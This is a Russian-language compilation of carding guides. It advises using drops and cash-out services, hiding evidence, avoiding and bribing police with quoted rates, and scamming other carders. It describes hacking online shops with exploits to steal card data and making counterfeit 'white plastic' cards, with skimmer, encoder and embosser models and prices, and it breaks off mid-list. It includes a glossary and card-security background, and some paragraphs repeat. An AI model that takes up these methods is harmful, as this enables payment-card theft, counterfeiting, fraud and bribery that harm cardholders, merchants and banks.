Несмотря на то, что работать с непосвященными дропами дешевле и удобнее, иногда имеет смысл воспользоваться услугами профессионалов. Это люди, которые знают, что товар и деньги - грязные. И сознательно берут на себя ответственность за все махинации. Естественно, за немаленький процент (обычно половину суммы). На форуме кардерпланета можно найти людей, которые всегда готовы обналичить деньги или принять товар. Можно воспользоваться также услугами зарубежных контор, которые обналичивают деньги в системе Bitcoin. В любом случае, занимаясь кардингом, всегда действуй через подставных лиц. Нигде и никогда не указывай свой настоящий адрес. Его также не должны знать сами дропы, с которыми ты работаешь, и дополнительные посредники, через которых ты, возможно, контактируешь с дропами. А если у "партнеров" появятся вопросы относительно тебя - смело ври. Причем ври так, чтобы это было невозможно проверить.

Чтоб не ругаться потом матом, сжигай любые компроматы

За время тяжкой работы по зарабатыванию чужих денег у тебя постепенно будет скапливаться полезное добро: номера кред, пароли и прочие радости, которые ты будешь называть "своим сокровищем". Для людей в серых шинелях эти же вещи проходят под названием "улики". И об этих самых уликах тебе нужно позаботиться загодя.

Во-первых, если у тебя не стоит PGP, скачай эту нужную программу с сайта www.pgp.com и закриптуй свой винт так, чтобы самому страшно от такой защиты стало.

Во-вторых, отучи себя от вредной привычки записывать деловую информацию на огрызках бумаги и бросать их где попало. Если придут менты и найдут под диваном обрывок бумажки с давно заюзанными кредами, тебе останется только кусать локти и смотреть, как эта шпаргалка гробит твою жизнь. Никакой компрометирующей информации не должно быть ни на мобиле, ни на КПК, ни на дискетах, заныканных глубоко в очке. Все на компе, все в зашифрованном виде. А если нужно срочно удалить особо компрометирующее файлы, юзай программу Kremlin (www.kremlinencrypt.com), которая стирает так, что никакой uneraser не поможет.

Матерые кардеры рекомендуют также использовать виртуальный писюк. Вкратце это программа, которая создает на винте образ нового компьютера, и работать с ним можно, как если бы к тебе по сетке была подключена другая машина. Вначале "винчестер" эмулируемой тачки девственно чист, и на него можно установить любую ОС, любые программы. У VirtualPC есть одна очень полезная фича, которая вносит эту вещь в разряд "must have" для каждого уважающего себя кардера. На виртуальном компе можно запускать любые приложения, серфить по любым сетевым джунглям и вообще творить что угодно. Все это временно будет сохраняться на фейк-винте, но достаточно завершить сеанс, клацнуть "отказ от сохранения", и вся информация о твоих последних перемещениях будет удалена. Виртуальный комп примет тот вид, который имел во время включения. Скачать это чудо можно с www.microsoft.com/windowsxp/virtualpc.

Попал к ментам - не обессудь, а денежку для них добудь

Несмотря на всю немереную анонимность, которой ты себя окружил, стопроцентных гарантий, что ты не попадешь в лапы ментов, тебе не даст никто. И уж если настал роковой миг, когда в дверь тарабанят с грозным воплем: "Откройте, милиция!", не паникуй, переходи к плану Б. На тему общения с ментами написано до фига статей, например, неплохую подборку материалов можно найти на www.prison.org. Главное, что ты должен запомнить, менты - это лживые, заискивающие и хитрые существа. И не друзья они тебе, а враги заклятые. Они будут сулить тебе свободу в обмен на чистосердечное признание, убеждать, что чем больше скажешь, тем меньше отсидишь. Но ты не ведись, на самом деле все с точностью наоборот. Ты им по фигу, им нормативы надо выполнить, посадить аккурат столько рож, за сколько премию дают. Так что держись мужественно и на все вопросы следователя отвечай: "Дяденька, вы что, да я даже терминов таких не знаю". Чем больше ты скажешь, чем больше подпишешь, тем ярче и длиннее будет твоя жизнь на зоне. Лучше промолчать и три дня отоспаться в обезьяннике, чем поговорить по душам с "добрым" опером и потом 3 года хлебать баланду.

Кстати, ты в курсе, что менты, хоть все из себя и неподкупные, но кушать тоже хотят. И вряд ли откажутся, если ты сделаешь финансовый вклад в фонд развития их семей. А за это они по дружбе закроют твое дело и отпустят с миром. На лапу давать лучше всего сразу, потому что когда дело дойдет до прокуратуры, отмазаться будет намного сложнее (или дороже). Тарифы варьируются от 200 до 2 тысяч баксов, в зависимости от тяжести твоего проступка, качества компромата на тебя и жадности ментов. В среднем баксов 500, думаю, должно хватить. Если прикинешься вечноголодным студентом, можно сторговаться и подешевле. Договориться практически всегда можно. Менты в этом плане люди понимающие.

Но мой тебе совет, не доводи до этого. Разговор с операми - не самое приятное занятие. Имей голову на плечах, умей ей пользоваться и всегда будь чуточку параноиком. Где-где, а в кардинге это качество никогда не помешает.

Путь кардера

Начинающим кардерам посвящается


Для новичка в деле кардинга есть два начальных пути, которые во многом определяют его дальнейший авторитет и развитие:

1. Путь риппера – самый простой по началу - путь кидания «честных кардеров» на карты или вмз. Сразу определяет негативное отношение к самой особе кидалы.

2. Путь «честного кардера» - путь требующий достаточных знаний в области хака и социальной инженерии. Как человек прошедший оба эти пути хочу описать каждый из них

достаточно подробно, рассмотрев все их плюсы и минусы.

Путь риппера

Рипперами обычно становятся неопытные, и мало знакомые с самим кардингом, как таковым молодые люди (большинство просто дети). Малолетнего неопытного кидалу легко опознать по новозареганному 9- тизнаку, и определенно по его детской речи. Но также существуют в сети несколько экземпляров профессиональных, хорошо организованных рипперов, к примеру известный на многих кардерских порталах человек под ником BAO (этого скорее можно отнести в раздел ОЧЕНЬ хорошо организованных рипперов, нежели к профессиональным). Основным инструментом кидалы является социальная инженерия – 100% проверено

что от хитрого и бывалого кидалы не спасают никакие меры, включая даже гарантов.

Первые шаги

Первое, чем я занялся когда решил попробовать себя но поприще рипперства (надо сказать к тому времени я уже был достаточно неплохим синжером) это продажа обычных карт с cvv кодом. Для этого я нашел на одном из форумов продавца карт и сделал ему «суперпредложение», сказав ему что хочу купить 7000 карт usa с cvv. Разумеется ни один

продавец не отказался бы от такого заказа (взыграла одна из главных ниточек управления синжера - жадность), и сказал что готов продать мне их. Я для порядка поломался немного, сбил немного цену и попросил у него 100 штук на проверку, убедив его что я буду постоянным и выгодным покупателем. Получив свои 100 халявных карт ушел в оффлайн и сменил аську (на asechka.ru продаются обычные 6-тизнаки по 1 вмз за штуку).

Легкие деньги

Вторым серьезным желанием стало желание обогатиться =). Т.к. честно стыренных карт было уже достаточно много (~600 шт.), я решил разводить людей уже на деньги. Это оказалось несложно, я предлагал людям купить огромные базы за смешные деньги (первая сделка была - 3000 карт за 180 вмз, при минимальной «рыночной» цене – 1.5 вмз за штуку) и предлагал на проверку те карты, добытые на халяву. Таким образом я срубил около 600$ за 2 месяца.

Эволюция

Потом простые карты с cvv кодом уже перестали меня интересовать, т.к. были дешевы и не приносили особой прибыли. Следующей ступенью была продаж карт с full info и enroll. Тут я заработал еще около 200$, но дело как-то не шло, и я решил заняться чем-нибудь другим – более прибыльным. Я решил «продавать» карженую технику. Знаете сайт carderproduct.org? Вот это и есть самые настоящие кидалы. Я работал более скромно но все же неплохо рубил бабла на этом. Особенно хорошо расходились телефоны nokia 6600 и нубуки =). Тут существует много способов развести человека, но для всех них нужно иметь неплохой опыт в социальной инженерии. Важно представить себя как серьезного продавца и показать что ты не собираешься идти на уступки и доказать покупателю что это в его интересах чтобы ты с ним работал. Можно наоборот показаться глупым ламером и делать очень много уступок, а потом когда человек расслабиться незаметно предложить ему свою незначительную с виду идею, которая тем не менее позволит провернуть твой грязный замысел =).

Заключение.

Малолетние рипперы – жалкие, презренные люди, достойные только сожаления, готовые за 5 баксов из тебя душу вытрясти своими неумелыми попытками тебя кинуть. Рипперы профессиональные лично мне внушают только уважение, как отличные социальные инжеры (хотя надо сказать этому таланту можно было бы найти и лучшее применение).

Плюсы:
- не нужно много ума
- достаточно безопасно
- можно заработать неплохие деньги (200 – 300$ в месяц)

Минусы:
- отрицательное отношение со стороны нормальных кардеров

Пост скриптум

В период работы с енроллом я понял что на нем можно неплохо заработать никого не кидая и, найдя дропа, начал его налить.

Путь кардера.

Про это написано уже много статей, так что я не буду повторять их а просто напишу кое-что упущенное в них, либо исправлю морально устаревшие ошибки этих статей. Для человека решившего стать нормальным кардером необходимо иметь неплохую базу в плане хакинга. Во многих старых статьях «для начинающих кардеров» писали о взломе инет-шопов через Гугл, юзая примитивные багги php/perl inlude. Сейчас такое уже не проходит, или проходит тока с самыми захиревшими шопами в которых вряд ли есть что нибудь полезное. Можно для начала посоветовать где-нибудь достать (купить) базу хостера – там наверняка есть парочка шопов. В конце концов можно просто просканить сервак шопа на предмет уязвимых сервисов и ломануть его каким-нибудь публичным или приватным эксплойтом. Так можно достать карты. Далее их можно продавать, что дает небольшой но стабильный доход, а главное – это достаточно безопасно. Далее можно использовать карты для закупки в инет шопах

(разумеется заказывать не на себя – для этого есть дропы). Если у тебя появиться карты с full info, то их можно использовать для онлайн доступа (заенроллить) и управлять счетом кардхолдера через инет; возможно осуществлять операции перевода на другие счета и т.п., но это чревато прозвоном из банка, который требует во-первых неплохого знания английского, а во-вторых опять навыка социальной инженерии. Можно заказать себе так называемый «белый пластик» и пойти шопиться в реальных магазах.

Плюсы:
- можно заработать очень много денег
- можно продуктивно сотрудничать с другими кардерами

Минусы:
- достаточно небезопасно
- новичку изначально нужны неплохие знания в области хакинга

Словарь​

Краткий кардерско-русский словарь

CC, картон, карты – кредитные карты или информация о них.

Фрауд (fraud) – незаконная операция. Со всеми вытекающими отсюда последствиями.

Кардхолдер (cardholder) – владелец карты

CVV/CVV2/CVN код – три-четыре цифры, улучшающие защиту карт при оплате через интернет. Теперь карты без этого кода практически нигде не принимаются.

Чекать карты (проверять на валидность) – проверка кредитных карт на работоспособность. Кредой могли воспользоваться до тебя, из-за чего кардхолдер мог ее заблокировать и, следовательно, сделать по ней уже ничего нельзя. Поэтому креды стоит брать у проверенных продавцов или где-то проверять. Проверка обычно заключается в съеме с карты минимально возможной суммы (около 10 центов). Если снять удалось, значит, креда рабочая, и ее надо срочно куда-нибудь вбивать. Проверять лучше через спецпрограммы или в специальных местах. На порносайтах чекать не советую, так как именно там они и убиваются.

Вбивальщик – человек, который знает, как правильно купить товар в е-магазине или аккаунт на порносайте, так чтобы при этом не появилось сообщение transaction declined.

Вещевой кардинг – одна из разновидностей кардинга, заключается в покупке реальных вещей по украденной креде. Обычно это бытовая техника, так как потом ее можно продать. А продавать надо, потому что, во-первых, ее очень сложно ввезти в Россию, а во-вторых – никому не нужны дома вещественные доказательства. Продажей может заниматься, например, иностранный дроп.

Дроп (от англ. drop – бросать) – человек, на которого «скидываются» наличные, чеки или товары, заказанные в магазине, которые он потом передает своему нанимателю. Дроп может и не знать, что приобретено все не совсем честным способом. Или наоборот, заниматься этим профессионально.

Вайер (wire transfer) – банковский перевод. Идет долго, но надежно. Весьма вероятен и чарджбэк, если деньги краденые. Чарджбэк (money back) – отзыв денег. Делают интернет-магазины, банки, электронные системы платежей. Производится, когда жертва кардинга заявляет, что ее обокрали. Поэтому в кардинге большое значение придается отмыву и обналичке денег.

Money orders или Cashier Checks – чеки, которые заранее оплачены. Из всех видов чеков эти - самые удобные для кардеров. С остальными приходится долго возиться: посылать их на проверку в другой банк и заполнять кучу бумаг. А эти чеки не требуют такого напряжения, правда и комиссионный процент у них очень неслабый.

Транзакция – операция по карте, начинающаяся с идентификации кардхолдера и до момента выдачи денег.

Палка – PayPal, система электронных платежей (типа наших WebMoney). Существенное отличие в том, что туда можно переводить деньги с креды. Правда, делать это становится все труднее и труднее - организуются лимиты ввода, лимиты вывода и еще много разных ограничений.

Нальщик – человек, который помогает перевести деньги в наличность. Допустим, к тебе пришел чек. Отдаешь его нальщику – получаешь наличность. Нальщики не налят креды! В основном они работают с чеками, банковскими вайерами, денежными переводами.

Эскроу-сервисы (escrow services) – конторы, которые играют роль гарантов при работе с аукционами. Ты им отсылаешь деньги, ЭС сообщает продавцу, что деньги есть, и он (продавец) отсылает товар. Получив его, ты сообщаешь об этом, и деньги уходят продавцу.

Белый пластик – это не пластик от элитных производителей, как мне однажды заявил «гуру» кардинга, а просто белый кусок пластика (обычно марки CR-80) с пустой магнитной полосой. Похож на CD-болванку, и на него тоже можно записать много интересного wink.gif.

Дамп – информация, записанная на магнитной полосе кредитной карты. Обычно состоит из 2 или 3 треков.

Трек (дорожка) – кусок информации, записанный на карте. Всего на карте их 3. Первый – инфа о владельце, второй – инфа о владельце, о банке и др., третий – запасной или для дополнительной информации. Самый важный - это второй трек. Третий нам не интересен, так как ничего ценного собой не представляет.

Эмитент пластиковой карты (card issuer) – контора, которая выдала карту. Это может быть банк, магазин (дисконтная карта) и др. Мы будем говорить о банковских кредитных картах, поэтому в качестве эмитентов будем рассматривать банки.

BIN (Bank Identification Number) – первые несколько цифр номера карты, которые указывают на банк-эмитент. Обычно это первые шесть цифр. Если банк очень крупный, достаточно и первых трех цифр. Банк-эквайер (acquirer) – банк, отвечающий за первичную обработку тразакций. То есть, сначала он работает с твоей кредиткой, магазинами, в которых ты отовариваешься, банкоматами, в которых ты получаешь деньги. Именно он распространяет стоп-листы.

Авторизация – процесс проверки наличия средств на счете у клиента.

Мерчант аккаунт (merchant account) – специальный счет в банке, который открывается продавцом, чтобы снимать деньги с карт-счетов. Например, решил ты принимать оплату кредитными картами. В банке открываешь такой счет, и на него поступают деньги от покупателей. Чтобы тебе не ждать, пока перейдут деньги с карт-счета, банк платит тебе из своего кармана, а сам ждет тех денег. Поэтому, чтобы открыть такой счет, нужно просто излучать уверенность, что твой ларек завтра не обанкротится.

Эмбоссер – аппарат, который выдавливает инфу на картах. Обращал внимание, что на кредитках буквы не нарисованы, а как бы выдавлены? Этим и занимается эмбоссер.

Энкодер (ридер) – девайс для чтения и записи инфы с магнитной полосы кредитки.

ATM (Automatic Teller Machine) – банкомат.

Импринтер – устройство, которое печатает на слипе данные, эмбоссированные на карте, и данные о точке, на которой расположен импринтер.

ПОС-терминал (point-of-sale terminal) – устройство, установленное в магазинах. Считывает инфу, записанную на магнитной полосе, и связывается с банком для проведения транзакции. В отличие от банкомата, ПОС-терминал управляется кассиром. В большинстве случаев

идентификация покупателя является визуальной, то есть кассир не спрашивает пин-код или удостоверение личности. Это не касается нескольких видов карт, требующих полной авторизации и идентификации при использовании.

Рассматриваем креду со всех сторон

Кредитки уже давно вошли в нашу повседневную жизнь окончательно и бесповоротно. Многие с их появлением почти забыли про наличные. Конечно, на это повлияло множество сопутствующих факторов: практичность, удобство, распространенность и относительная безопасность.

Но сегодня мы рассмотрим креды не с привычной – электронной - стороны, а с несколько другой – что это за кусок пластика и каким образом он работает.

История

Самые первые кредитки появились около ста лет назад (в США – где же еще), тогда они использовались исключительно в магазинах, ресторанах и отелях для обслуживания респектабельных постоянных клиентов, и ни о каком серийном производстве не было и речи. Карточки, по сути, пришли на смену оплаты в рассрочку. В те далекие времена креды были сделаны из толстого картона, затем появились металлические карточки (уже эмбоссированные), и только потом, после длительных экспериментов с различными пластмассами, появились пластиковые карты.

Первой фирмой, занимающейся серийным выпуском кредиток (для ресторанного бизнеса) стала Dinners Club (с 1949 года). Тогда впервые фирма-производитель кред работала посредником между покупателем и продавцом. Также Dinners Club попыталась создать универсальную карту (между прочим - фирма жива до сих пор). Затем производством кред занялась American Express (крупнейший производитель дорожных чеков), Bank of America и Chase Manhattan Bank (два крупнейших банка страны). В 1966 году Bank Of America совершил серьезный прорыв, позволив другим банкам проводить операции с их фирменными кредитками BankAmericard. За короткий срок эта платежная система получила национальный масштаб, затем в стране организовалась вторая подобная система - Interbank Cards Association.

В скором времени пластиковые карты стали международным стандартом, количество пользователей измерялось десятками миллионов. В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции. Кстати, эти две системы долгое время противостояли друг другу, запрещали банкам одновременно выдавать обе карты, но это было раньше. Совершенствование кред продолжается до сих пор, следующим этапом эволюции планируется практически полный переход на смарт-карты, что добавит множество плюсов (в первую очередь – серьезную защиту, построенную на криптографических алгоритмах), но об этом я расскажу ниже.

Стандарт

Введение мирового стандарта послужило решающим фактором для всеобщего признания. На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию. Естественно, по этому мировому стандарту и производится абсолютно все обслуживающее оборудование (импринтеры, электронные терминалы, банкоматы). Производителям пластиковых карточек позволено только экспериментировать с дизайном карточек, да и то в очень строгих рамках.

Все кредитки можно разделить на несколько классов:
  1. Чиповые карты (смарт-карты) – кредитки со встроенной микросхемой или памятью (чипом).
  2. Эмбоссированные карты – кредитки, часть текста на которых печатается методом тиснения или термопечати. Эмбоссированный текст необходим для печати оттисков на чеках, но такое используется в основном в США и для визуального распознавания текста.
  3. Магнитные карты – креды с магнитной полосой.
Такое разделение крайне условно, так как в большинстве кред эти характеристики сочетаются (иногда одновременно все три).

Кредитка состоит из нескольких отдельных функциональных элементов, о которых я ниже расскажу подробнее: кусок пластика (с эмбоссированным текстом), магнитная полоса, микросхема или память (чип) и некоторые другие менее значимые элементы.

Основа

Сама карточка сделана из куска особого пластика размером 85,6х53,98х0,76 мм. Пластик производится по сложной технологии, окрашивается, на заготовку наносятся обязательные общие данные про эмитент и платежную ассоциацию, а также - памятка владельцу, контактная инфа производителя и фотография владельца. После этого креда ламинируется, затем (по необходимости) на ней эмбоссируются или выжигаются лазером необходимые идентификационные данные (номер карты, имя владельца, срок действия), встраивается чип или магнитная полоса. При производстве особое внимание уделяется безопасности во время персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)). Также все этапы производства креды находятся под пристальным контролем качества - брак должен моментально отсеиваться, а карта должна удовлетворять множеству международных требований, в том числе - выдерживать нагрев до определенных температур, сопротивляться определенным механическим воздействиям и многое другое (все по тому же стандарту).

Магнитная полоса

Магнитная полоса располагается на реверсе креды, в верхней части, недалеко от верхнего края. Внешне она ничего интересного собой не представляет – черная или коричневая полоса во всю длину карты. Полоса состоит из нескольких магнитных дорожек (чаще всего – 3). Ширина ее составляет от 10,1 до 10,3 мм (если на креде 3 дорожки). Каждая дорожка отвечает за хранение своей собственной информации, при этом на каждой дорожке могут располагаться максимум 107 символов (цифровых или буквенных).

  • 1 дорожка содержит основную инфу: идентификационный номер, общую информацию о владельце, сведения про эмитент, срок действия карты и немного служебной информации.
  • 2 дорожка отвечает за авторизацию карточки (полностью определяет, какие операции и на какую сумму ты можешь производить с кредой), а также дублирует часть инфы с первой дорожки.
  • 3 дорожка используется в основном при работе с банкоматом (иногда ее может и не быть – тогда магнитная полоса будет уже). Первые две дорожки только для чтения, третья – также и для записи (на ней, например, банкомат делает отметки о снятии денег). Для защиты магнитной полосы от подделок существуют специальные проверочные коды CVV (Card Verification Value) для Visa и CVC (Card Verification Code) для Europay, но копированию полосы они противостоять не могут.
Чип

Чип – самый высокотехнологичный элемент креды, и, естественно, этот вид карт стал применяться сравнительно недавно. Можно с уверенностью сказать, что за смарт-картами будущее (вернее, уже и настоящее).

У чиповых карт множество преимуществ перед другими и лишь один недостаток. Первый плюс – надежное хранение информации. А это - один из определяющих факторов в финансовых операциях (деньги ведь никто не хочет терять). Хотя, как ты знаешь, непробиваемой защиты не существует. Потом, если в карточке используется микросхема, то креда может сама принять решение о правомерности выполняемой сделки. К недостаткам можно отнести, разве что, сравнительно высокую стоимость производства карты.

Чиповые карты делятся на карты с памятью и карты с микросхемой.

Больше всего сейчас распространены креды с памятью (это самый простой вариант чиповой карты).

Для хранения инфы используется EEPROM (electrically erasable programmable read-only memory - электрически стираемая программируемая память только для чтения). Для обеспечения безопасности финансовых операций, вся память разделена на несколько зон, каждая из которых защищена отдельно (каждая своим ключом, одна из них - твоим pin-кодом). Считыванием инфы и определением валидности карты занимается терминал.

Карты с микросхемой устроены значительно сложнее, и, соответственно, стоимость их производства намного выше. В кредах применяется 8-разрядный проц, а также имеется постоянная (ROM) и оперативная (RAM) память. Для хранения информации используется все тот же EEPROM. Рабочий софт (некое подобие операционки) прошит жестко и перезаписи не подлежит. Аппаратная криптографическая защита построена обычно на алгоритмах RSA (Rivest-Shamir-Adleman) или DES (Data Encryption Standard) - про них ты наверняка много раз читал в Хакере.

Конечно, никаких элементов питания на карте не предусмотрено, поэтому креда «включается» только тогда, когда на нее терминалом подается рабочее напряжение (через контакты чипа).

Одним из бонусов креды с микросхемой является электронный кошелек. Он реализован аппаратно и представляет собой особый файл в памяти, содержащий сведения о количестве средств на счете. Для доступа к кошельку необходимо знать pin-код. При добавлении или списании средств со счета, соответственно изменяется файл.

Для большинства чиповых кред используется спецификация EMV, разработанная крупнейшими платежными системами: Europay, MasterCard и Visa.

При всем этом, кредитка может выполнять и дополнительные функции. Например - играть роль бесконтактного проездного в метро (кстати, такие креды иногда выдают студентам даже в наших вузах).

В последние время стали продвигаться всевозможные проекты девайсов для бесконтактного использования контактных кред (например, при помощи Bluetooth). Т.е. ты вставляешь кредитку в небольшой переходник и при оплате карточку доставать уже не нужно. Переходник сам обменяется всеми необходимыми данными с электронным терминалом. Так как все данные передаются по радиоканалу, то нет никакой гарантии, что их никто не перехватит. Поэтому весь трафик шифруется (при помощи ключей, которые передаются только на этапе персонализации карточки). Это, конечно, выглядит довольно ненадежно, но что поделаешь – всем хочется удобства.

Щит и меч

Физическая (иногда ее еще называют полиграфической) защита кредитки состоит из нескольких частей. К ней относятся, например: голограмма, полоса для подписи, фотография владельца, скрытые рисунки/надписи и микрошрифт. Давай остановимся на этом поподробнее.

Голограмма. Голограмма производится из нескольких соединенных слоев фольги, нередко на нее еще и эмбоссируется часть текста, что затрудняет попытки изготовить подделку креды. К примеру, на голограмме Визы изображен голубь, который вращает головой и машет крыльями, на МастерКарде – красочный глобус и карта мира. Долгое время точно подделать голограмму не могли, сейчас и это – уже не проблема.

Полоса для подписи. Полоса для подписи расположена на реверсе креды. Фоном полоски служит асимметричный и/или сложный рисунок, она изготовлена из соответствующего материала, препятствующего стиранию и смыванию подписи. Необходимо, чтобы подпись полностью соответствовала подписи на документе, удостоверяющем личность владельца. В некоторых случаях на полосе еще выжигается лазером номер карты.

Фотография владельца. Также расположена на реверсе. Фотка – самый простой способ проверить, являешься ли ты владельцем.

Скрытые рисунки/надписи. Обычно на карточку наносятся специальными красками скрытые рисунки, невидимые невооруженным глазом. Такие рисунки видны либо в ультрафиолете, либо через специальные фильтры.

Микрошрифт. Печать микрошрифтом - еще один вид защиты. Текст, напечатанный микрошрифтом, практически неразличим невооруженным глазом – высота каждой буквы около 1/5 мм. Например, на карточке Visa Electron текст, напечатанный микрошрифтом, находится по периметру логотипов Visa и Electron.

Защита кредиток усложняется по мере их распространения. Производители придумывают все новые виды защиты, и они все постепенно обходятся. С масштабным введением нового вида карт возникает много сложностей, учитывая, сколько миллионов человек сейчас пользуются кредитками (у всех надо кредитки изъять и выдать новые). Сейчас полиграфическая защита переживает определенный кризис, рынок подделок принимает критические размеры, банки терпят от кардерства большие убытки. Единственной надеждой остается переход на смарт-карты с аппаратной реализацией криптографической защиты.

Как нас подделывают

Несмотря на столь серьезную защиту, подделок очень много. Многие фальшивки делаются буквально на коленке, и их качество оставляет желать лучшего, но встречаются и практически неотличимые от настоящих. Кстати, по количеству подделок Россия - признанный лидер.

Самый распространенный и самый качественный вид подделок – так называемый «белый пластик». Используется он так: данные о владельце карты наносятся на девственно чистые креды (болванки). Иногда номера на карточке перебиваются (срезаются/наклеиваются) и такой метод из-за своей популярности даже получил название shave & paste (срезать и наклеить). Понятно, что все подобные действия уголовно наказуемы (срок могут дать немалый).

Как видишь, креда - это не просто пластмассовая пластинка. Кредитки постоянно совершенствуются (уже сейчас креда напоминает миниатюрный компьютер), производители объединяют усилия для борьбы с подделками. Чем все это закончится – посмотрим, но кредитки были, есть и будут.

В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции.

На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию.

При производстве особое внимание уделяется безопасности на этапе персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)).

К защитным механизмам креды относятся: голограмма, полоса для подписи, фотография владельца и микрошрифт.

Сделай кредитку своими руками

В отличие от детей, кредитные карты делать гораздо сложнее. Кроме навыков и опыта, нужны и соответствующие девайсы. Основные принципы изготовления черпай из статьи, а остальное уже на практике.

Что нужно для производства карт

Все начинается с исходного материала, собственно, подложки любой карточки. В народе для простоты называется пластиком или картоном. Купить пластик нужного размера с вклеенной магнитной полосой сейчас не проблема. Покупать стоит белый пластик, это позволит сэкономить на краске для принтера.

Чтобы из купленного пластика сделать полноценную карту, тебе придется помучиться со специальным оборудованием. Начинается все, как ты понимаешь, с печати изображений на карте. Для небольших тиражей (до 1000 штук) используется метод сублимационной печати.

Чтобы получить качественное изображение, которое не стыдно продемонстрировать своей девчонке или сокурсникам, тебе понадобится специальный принтер для печати на пластиковых картах. При выборе принтера надо внимательно изучить его характеристики. Принтеры делятся на следующие группы: монохромные и полноцветные, односторонние и двухсторонние (на двухстороннем можно печатать сразу обе стороны за один проход). Большинство принтеров имеют встроенные или опциональные (с возможностью докупить нужный блок) дополнительные функции: ламинатор, энкодер, эмбоссер, типпер, а также устройство для вклеивания голограммы и полосы подписи.

С последней функцией более или менее ясно, расскажу про остальные. Ламинатор требуется для того, чтобы после печати покрыть изображение специальной защитной пленкой, этот несложный процесс называется ламинацией. Энкодер поможет тебе записать дамп на магнитную карту, эмбоссер выдавит инициалы и "секретную" комбинацию цифр прямо на карте, а типпер (не путай с триппером) окрасит эмбоссированные символы.

Технология по шагам

Для изготовления полноценной карты надо реализовать несколько нехитрых операций:
  • печать изображений на обеих сторонах карты;
  • ламинация;
  • эмбоссирование;
  • типпинг;
  • вклейка голограммы и полосы подписи;
  • запись информации на магнитную ленту с помощью типпера.
Советы бывалого

С принтером все просто - главное, чтобы его разрешение было не менее 300dpi, он мог печатать без полей и не отрыгивал карты толщиной 0,75 миллиметра. Если принтер не соответствует хотя бы одному из перечисленных параметров, забудь о его существовании.

Не помешает поинтересоваться стоимостью расходных материалов, так как впоследствии это может вылиться в забавную сумму. Помимо стоимости, необходимо также поинтересоваться доступностью этих материалов, чтобы не летать потом за ними в Африку. Понятно, что noname всегда дешевле, но все же советую приобретать оборудование известных фирм. Лидеры в производстве сублимационных и термотрансферных принтеров - это Eltron и Fargo. Покупать только оригинальные (читай - родные) расходные материалы или нет - дело вкуса, но с родными качество гарантировано.

С эмбоссерами вообще элементарно. Здесь получаемое качество практически одинаково для всех моделей, цена зависит лишь от производительности и бренда. Самый простой - это ручной эмбоссер, не требует электропитания и прост в обращении.

При покупке типпера, так же, как в случае с принтером, уточни стоимость и доступность фольги именно для этой модели. А отдельный ламинатор вообще не нужен, проще купить принтер или эмбоссер со встроенным ламинатором. Отдельно ламинатор обойдется дороже, а времени на изготовление одной карты уйдет больше.

Энкодеры умеют записывать два вида карт - high и low coercivity. По сути, это высокая и низкая намагниченность. Имеет смысл купить энкодер, понимающий любые карты. И отдельное замечание по поводу траков - не гонись за энкодером, который записывает все три трака (магнитная полоса имеет три области, называемые траками). Третий трак не читается практически ни одним ПОС-терминалом и уж тем более банкоматами. Так стоит ли переплачивать за бесполезную навороченность? Такой энкодер может понадобиться лишь для выпуска кредитных карт, дающих владельцам определенные скидки.

TA-32 (скимер)
  • Цена: 1200 зеленых
  • Память: 512 Кб (около 3000 дампов)
  • Траки: считывает 1, 2, 3
  • Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
  • Подключение: USB
  • Размеры: 8,25х2,03x2,67 см
  • Все: 49 граммов
Характеристики

Описание: этот ридер отличается хорошей работоспособностью, позволяет на лету считывать карты любой толщины и с любой плотностью записи. Позволяет считывать в обе стороны и с любой скорость. Термоустойчив, работает при температуре от 0 до 60 градусов. В комплекте идет программное обеспечение. Корпус сделан из суперпрочного пластика ABS, специально для тех, у кого трясутся руки.

PMR-202 (скиммер)
  • Цена: 1190 зеленых
  • Память: 128 Кб (около 1000 дампов)
  • Траки: считывает 1, 2
  • Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
  • Подключение: USB
  • Размеры: 4,6х3x3,08 см
  • Вес: 54 грамма
Характеристики

Описание: из фишек этого скиммера можно отметить автоматическое отключение питания при долгом простое, защиту от нежелательных пользователей (защита паролем от несанкционированного доступа). В комплекте идет ПО для работы со скиммером.

AMC-772 (энкодер)
  • Цена: 1000 зеленых
  • Траки: записывает и считывает 1, 2
  • Подключение: USB
  • Вес: 1,33 кг
Характеристики

Описание: один их самых надежных, а следовательно, популярных энкодеров. Подключается к USB, что актуально в последнее время. Жизнеспособность магнитной головки составляет около миллиона проводок, тебе этого хватит и еще останется детям. В наборе идет стандартное ПО.

Matica Z1 (эмбоссер)
  • Цена: 4700 зеленых
  • Размеры: 43х40x17 см
  • Вес: 17 кг
Характеристики

Описание: идеальное решение, проверенное временем. Компактность, приятный дизайн, небольшие размеры и тихая работа. Z1 имеет автоматическую загрузку карт (на выходе готовые карты помещаются в выходной лоток для максимальной экономии пространства), внутреннюю систему диагностики и ЖК-дисплей, обеспечивающий непрерывный контроль работы. Рекомендуемая производительность: 300-500 карт в день. Совместим с окошками, подключение через USB.

Matica Z Tipper (типпер)
  • Цена: 1990 зеленых
  • Размеры: 25х25x20 см
  • Вес: 3 кг
Характеристики

Описание: Matica Z типпер - одиночное устройство для окрашивания эмбоссированных карт (точнее выдавленных символов на них). Чрезвычайно компактные размеры позволяют установить девайс в любое место. Очень прост в работе, задается необходимая температура и прижим для получения идеального результата. Жидкокристаллический дисплей, которым оснащен этот типпер, показывает текущее состояние машины и температуру. Кроме того, функция энергосбережения приводит к пониженному потреблению энергии при простое машины в режиме ожидания. Лента для окрашивания может быть различного цвета. Установка и замена картриджа для загрузки ленты производится элементарно. Скорость окрашивания составляет всего несколько секунд на одну карту!

Eltron P210i (принтер)
  • Цена: 2195 зеленых
  • Размеры: 12,5x17x24 см
